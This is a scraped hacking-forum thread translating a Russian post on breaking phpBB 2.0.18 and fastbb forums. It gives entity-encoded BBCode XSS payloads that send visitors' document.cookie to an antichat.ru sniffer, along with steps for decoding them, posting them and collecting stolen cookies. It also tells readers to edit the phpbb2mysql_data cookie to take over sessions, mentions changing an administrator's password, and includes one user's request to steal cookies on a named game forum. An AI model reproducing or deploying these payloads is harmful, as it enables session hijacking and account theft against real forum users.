phpbb 2.0.18 ?

Hello my friends !!

It is possible to have a traduction to this post please http://forum.antichat.ru/thread10613.html

I don't understand...


ThX

 

I toiled again from inaction, and I think.... I shall go phpBB 2.0.18 breakings.. Has not spent some seconds, catch a code alert more shortly:

HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]

Code Sniffera:

HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]

Clean signs "+" In SPECIAL symbols!

http: // webmastertools.narod.ru/OnlineTools/url_decode.html

For editing cookie here to you the reference. Is better in the Opera and not forget, that change only phpbb2mysql_data a phpbb2mysql_sid can not change and not touch. The sniffer is done using this reference:

http: // www.h4cky0u.org/encrypt/index.php

Well and to whom it is interesting, read this clause for preventive maintenance

http: // forum.antichat.ru/thread10119.html

How to break fastbb under the numerous request to visitors antichat

Alert:

HTML:

[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]

Sniffer:

HTML:

[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]

P.S. The continue coming soon. (Monday)

 

Excellent !!! BiG ThX Deniska

 

I was marking around again, (as usual), so I thought to myself: > I think I will go hack phpbb now..."

So off I went! So I spent a few seconds on it..anyway....here is the alert function.

HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]

Sniffer's code:

HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]

Eliminate all the plus signs from the above code.

http://webmastertools.narod.ru/OnlineTools/url_decode.html

Use this link, to encode your cookies.

For tempering with your cookies, you ought to use Opera and don't forget, that you are only supposed to touch "phpbb2mysql_data" so "phpbb2mysql_data" should be left as it is.

Sniffer's codes are made using the following url:

http://www.h4cky0u.org/encrypt/index.php

And to anybody who is interested, they should read this article just because.


Because of the many requests that were made by antichat users, here is a way to hack fastbb.ru

HTML:

[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]

(It doesn't actually work anymore)

HTML:

[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]

I don't know what the security is like on fastbb.ru but if necessity calls, you can always change Administrator's password by yourself.



You can actually use this link for the complete reference and it's easier as well...

http://kobeluga.narod.ru/codes.txt

 

Can you make a movie please ?

 

There is not present about phpbb 2.0.18 more.
To take a code - to clean "+" in special symbols - to put on a forum - to receive coocies here: antichat.ru/sniff/log.php
Alert for check. It is possible to check up on a preview - your coocies will come.
The code works only in IE.

 

Sorry.. but I don't receve a cookie in http://antichat.ru/sniff/log.php with this script

HTML:

[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]

 

alarm on the other hand functions well

 

"+" should be cleaned everywhere except for "+document.cookie"
What shows a forum on a preview?

 

Yes it is !

Thank you very much my friend...

Antichat powaaaa !

 

Have You another address please..
Because http://www.h4cky0u.org/encrypt/index.php is dead :s

ThX

 

néM3S!s
Check this service:
http://www.christ4you.org/modules/xoopstools/index.php?func=HTMLENCODER

 

ThX.. i'm stupid..

 

Don't know how to use it??)

 

yes, I know.. thx
I'm stupid because I ask before seeking..
I have make my personal encoder

 

sorry but i want to learn an information about this code

Code:

[url]http://www.[email][email protected] style=`background:expression(alert(/wj/))`[/email][/url]

how can i steal cookie of someone by this code? can anyone help me about this? i dont know how to inject in this code image code to steal cookie . site== www.ogame.org (forum)

 

sorry code is invisible here address is this == code@s name is burning board 2.3.3
http://kobeluga.narod.ru/codes.txt